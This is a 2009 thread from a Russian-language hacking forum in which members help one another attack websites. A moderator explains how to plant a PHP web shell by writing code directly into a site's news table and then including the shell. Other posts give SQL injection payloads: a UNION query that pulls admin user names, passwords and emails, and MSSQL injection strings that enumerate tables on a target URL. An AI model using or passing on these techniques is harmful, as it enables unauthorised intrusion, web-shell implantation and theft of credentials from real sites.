 |
|
04.08.2009, 18:52
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
довольно часто бывает без ковычек
|
|
|
06.08.2009, 06:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DeluxeS
Имею доступ к админке. Двиг самописный. Могу редактировать новости. даже html не вставляет типа
Код HTML:
<script>alert(//);</script>
Есть ли возможность вставить шелл\php код? Вообще если даже html отбрасывает, то наверно нет.
В бд есть таблица с новостями, там то точно фильтра нету, сделай прям в таблице PHP скрипт.
Ну а вообще некто не отменял проверять 
PHP код:
<?PHP
echo "Proverka antichat";
?>
Потом заходишь в новость, CTRL+F, Proverka antichat.
Если найдено -> include('твой шелл');
Если ненайдено -> облом, ищи другую дыру.
|
|
|
|
06.08.2009, 07:08
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
тогда вставляй туда уже любой свой хтмл/жаваскрипт код только шеллом это тебе не светит...
|
|
|
|
06.08.2009, 08:47
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DeluxeS
т.е. как?)
зы: <?php echo "test"; ?> не пашет, прямо так и выводит ((
В таблице - в базе данных.
Просто перед заносом данных в таблицу новостей.
Идёт фильтр написанный на PHP.
А так если вручную вписать то выполниться.
|
|
|
|
06.08.2009, 09:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
В вышеприведенном скрипте - нет.
HTML не имеет доступа к файловой системе.
|
|
|
|
06.08.2009, 13:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Фильтрует именно ">? Или " и > по очереди?
|
|
|
|
06.08.2009, 22:04
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DeluxeS
Узнал таблицу,поля,столбцы.
По запросу
Выдаёт ошибку.
Что не так?
Так же пробовал
Limit, потом может быть addslashes.
union+здесь кол-во полей и т.п. +concat_ws(0x3b,user_name,password,email)+from+adm in_user+limit+1,1+--+
|
|
|
|
06.08.2009, 23:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
не думал что она просто закрыта?
|
|
|
|
06.08.2009, 23:11
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от HAXTA4OK
не думал что она просто закрыта?
На ключ?
DeluxeS
https://forum.antichat.ru/thread104591.html
Вопрос №3
|
|
|
|
07.08.2009, 01:20
|
|
Познающий
Регистрация: 26.08.2008
Сообщений: 67
С нами:
9320003
Репутация:
32
|
|
site.com/request_list.asp?action=view&id=111814+and+1=(sele ct+@@version
но при
site.com/request_list.asp?action=view&id=111814+or+1=(selec t+top+1+table_name+from+information_schema.tables)--
ругается а-ля
Incorrect syntax near the keyword 'from'.
при union select верном пишет Incorrect syntax near '@@version'.
перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
